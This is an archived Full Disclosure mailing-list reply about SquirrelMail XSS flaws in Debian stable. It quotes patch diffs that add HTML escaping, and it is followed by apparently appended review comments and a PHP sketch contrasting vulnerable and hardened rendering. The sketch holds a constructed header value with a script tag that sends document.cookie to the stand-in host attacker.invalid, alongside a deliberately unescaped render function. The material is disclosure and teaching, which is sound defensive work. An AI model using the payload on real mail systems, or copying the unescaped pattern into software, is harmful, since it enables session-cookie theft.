
Full Disclosure mailing list archives
Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
From: Roman Medina <roman () rs-labs com>
Date: Wed, 02 Jun 2004 01:49:01 +0200
On Tue, 1 Jun 2004 23:13:32 +0200, you wrote:

> On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote:
>> I also noticed that latest Debian stable distro ships a very old version of
>> SquirrelMail, which is vulnerable to several old XSS bugs (in addition to
>> the new one).
>
> The latest Stable is itself quite old. Debian does not release very often.
> But security bugs are fixed when they become known. I have not found any bug
> report concerning XSS in the Debian bugs database. Please be so kind and file
> bugs if you are running Debian. If not, please mail the Debian Security Team
> as described in http://www.de.debian.org/security/faq#contact
The point here is that it is not easy or always possible to track every error being corrected in every piece of software. In other words, many vendors/developers silently fix bugs, and they don't necessarily have to know who is packaging their software and inform them. Mix this with the (IMHO) too conservative Debian policy, beat well and you've got it :-)

I did not perform an exhaustive check. I simply chose some of the latest 2.x versions from the changelog where the string "XSS" was listed; I had the strong feeling that the bug would still be present in Debian stable. And I guessed right :) The result is listed in my advisory. Quoting from it:

"
I chose between two beautiful bugs:

roman@rs-labs:~$ diff -ur squirrelmail-1.2.10/src/read_body.php squirrelmail-1.2.11/src/read_body.php @@ -976,7 +977,7 @@ "<TD BGCOLOR=\"$color[0]\" ALIGN=RIGHT VALIGN=TOP>" . _("Mailer") . ': '. "</TD><TD BGCOLOR=\"$color[0]\" VALIGN=TOP colspan=2>" . - - "<B>$mailer</B> " . + "<B>" . htmlentities($mailer) . "</B> " . '</TD>' . "</TR>" . "\n";

roman@rs-labs:~$ diff -ur squirrelmail-1.2.10/functions/mailbox_display.php squirrelmail-1.2.11/functions/mailbox_display.php require_once('../functions/strings.php');
@@ -59,7 +59,7 @@ if ($senderName != '') { $senderName .= ', '; } - - $senderName .= sqimap_find_displayable_name($senderNames_part); + $senderName .= htmlentities(sqimap_find_displayable_name($senderNames_part)); } }
"

I repeat that I didn't test other versions (and I don't have more time to spend on this).

I've placed the Debian security team email on CC, but you should know that I informed Sam (Debian maintainer for SM) of all these issues. Indeed, I've exchanged many mails with the SM team / Sam (both of them always being on CC / To). The final advisory was also sent to Sam before the release. I supposed he would release new .deb packages. I don't know what happened.

Regards,

--Roman

--
PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
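Review bot: In the read_body.php hunk, htmlentities($mailer) is called with no flags and no charset, so it runs with PHP's defaults: ENT_COMPAT, which leaves single quotes unescaped, and (on PHP of this era) ISO-8859-1 as the assumed charset. Inside the <B>...</B> element content the unescaped single quote is not exploitable, but the charset default means a Mailer header carrying UTF-8 text is rewritten byte-by-byte into Latin-1 entities instead of being displayed. A call such as `htmlspecialchars($mailer, ENT_QUOTES, $charset)` with the message's charset escapes exactly the five HTML metacharacters and leaves the rest of the string intact, which is both safer and more predictable for a display-only value.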
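Review bot: In the mailbox_display.php hunk the escaping happens while $senderName is being assembled (`$senderName .= htmlentities(sqimap_find_displayable_name(...))`), not where it is rendered, which silently commits the variable to one output context. Any later consumer that truncates $senderName to fit the column or escapes it again (neither is visible in this hunk, so please check the call sites) will either cut an entity such as &amp; in half or double-encode it. Escaping once at the print site, or at least a comment stating that $senderName is already HTML-encoded from this point on, keeps that invariant visible to the next person editing the loop. The same ENT_QUOTES/charset remark as for the read_body.php hunk applies to this htmlentities() call.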
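As an added illustration that is not part of Roman's message or of SquirrelMail's own source: a stand-alone PHP sketch of the Mailer row from read_body.php, with the 1.2.10 raw-concatenation pattern beside an escaped version. The render functions, the `$color` array, the `contains_live_tag()` check and both header strings are constructed here for the example; the hardened version uses `htmlspecialchars()` with ENT_QUOTES and an explicit charset rather than the bare `htmlentities()` of the real patch, to show the charset caveat on a UTF-8 value.

```php
<?php
// Added example, not SquirrelMail code: the Mailer header of an incoming
// message is attacker-controlled, and read_body.php printed it straight into
// the page. Everything below is constructed for illustration.

// Constructed sample header values (what an attacker's MUA could send).
$constructedMailer = 'Evil Mailer 1.0 <script>document.location='
    . '"http://attacker.invalid/?c="+document.cookie</script>';
$constructedUtf8Mailer = "Mailprogramm für unterwegs";   // UTF-8, no markup

// Stand-in for SquirrelMail's theme colour table.
$color = array('#ffffff');

// Vulnerable: mirrors the 1.2.10 pattern, header value concatenated raw.
// (SquirrelMail wraps "Mailer" in _() for gettext; a literal is used here.)
function render_mailer_row_vulnerable($mailer, $color) {
    return "<TR><TD BGCOLOR=\"$color[0]\" ALIGN=RIGHT VALIGN=TOP>" . 'Mailer: ' .
           "</TD><TD BGCOLOR=\"$color[0]\" VALIGN=TOP colspan=2>" .
           "<B>$mailer</B> " . '</TD>' . "</TR>\n";
}

// Hardened: escape at the output site. htmlspecialchars() with ENT_QUOTES and
// an explicit charset neutralises < > & " ' and leaves non-ASCII bytes alone,
// whereas htmlentities() under a Latin-1 default rewrites every high byte of
// a UTF-8 sequence into a separate entity.
function render_mailer_row_hardened($mailer, $color, $charset = 'UTF-8') {
    $safe = htmlspecialchars($mailer, ENT_QUOTES, $charset);
    return "<TR><TD BGCOLOR=\"$color[0]\" ALIGN=RIGHT VALIGN=TOP>" . 'Mailer: ' .
           "</TD><TD BGCOLOR=\"$color[0]\" VALIGN=TOP colspan=2>" .
           "<B>$safe</B> " . '</TD>' . "</TR>\n";
}

// Constructed check: does the rendered HTML still contain a live tag that
// originated in the untrusted header?
function contains_live_tag($html) {
    return stripos($html, '<script') !== false;
}

$vuln = render_mailer_row_vulnerable($constructedMailer, $color);
$hard = render_mailer_row_hardened($constructedMailer, $color);

echo "vulnerable row:\n" . $vuln;
echo "  live tag present: " . (contains_live_tag($vuln) ? 'yes' : 'no') . "\n";
echo "hardened row:\n" . $hard;
echo "  live tag present: " . (contains_live_tag($hard) ? 'yes' : 'no') . "\n";

// Charset caveat: the same UTF-8 string through the two escaping functions.
echo "htmlspecialchars, UTF-8:      "
    . htmlspecialchars($constructedUtf8Mailer, ENT_QUOTES, 'UTF-8') . "\n";
echo "htmlentities, ISO-8859-1:     "
    . htmlentities($constructedUtf8Mailer, ENT_QUOTES, 'ISO-8859-1') . "\n";
// The first line keeps "für"; the second turns the two UTF-8 bytes of "ü"
// into "&Atilde;&frac14;", which is what a reader of a UTF-8 message sees
// when the escaping call assumes Latin-1.
```

The two render functions differ only in the one concatenation the patch touched, which is the point: the fix is a single output-site escape, and the remaining question for a reviewer is which escaping function and charset to use, not where the sink is.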
Current thread:
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Lupe Christoph (Jun 01)
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Roman Medina (Jun 01)
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Matt Zimmerman (Jun 01)
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Cory Donnelly (Jun 02)
- Re: Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Roman Medina (Jun 02)
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Matt Zimmerman (Jun 01)
- Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability Roman Medina (Jun 01)